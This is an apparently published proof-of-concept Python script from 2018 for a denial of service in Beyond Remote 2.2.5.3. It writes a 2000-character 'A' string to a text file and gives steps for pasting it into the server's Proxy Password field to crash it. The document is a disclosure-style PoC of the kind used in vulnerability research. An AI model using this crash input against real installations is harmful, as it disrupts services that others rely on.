27 lines
No EOL
845 B
Python
Executable file
27 lines
No EOL
845 B
Python
Executable file
# Exploit Title: Beyond Remote 2.2.5.3 - Denial of Service (PoC)
|
|
# Author: Erenay Gencay
|
|
# Discovey Date: 2018-09-24
|
|
# Vendor notified : 2018-09-24
|
|
# Software Link: https://beyond-remote-client-and-server.jaleco.com/
|
|
# Tested Version: 2.2.5.3
|
|
# Tested on OS: Windows XP Professional sp3 (ENG)
|
|
|
|
# Steps to Reproduce: Run the python exploit script, it will create a new file
|
|
# file with the name "mre.txt". Copy the content of the new file "mre.txt".
|
|
# Start Beyond Remote Server 2.2.5.3 and click "Configure" than click "Update Options" than
|
|
# click "Proxy Settings" Paste the content into field "Proxy Password" click "OK"
|
|
# It will cause the DOS situation.
|
|
|
|
bof = "A" * 2000
|
|
|
|
try:
|
|
|
|
print("payload is loading..")
|
|
|
|
dosya = open('mre.txt','w')
|
|
dosya.write(bof)
|
|
dosya.close()
|
|
print(" [+] File Created")
|
|
|
|
except:
|
|
print("Someting went wrong !") |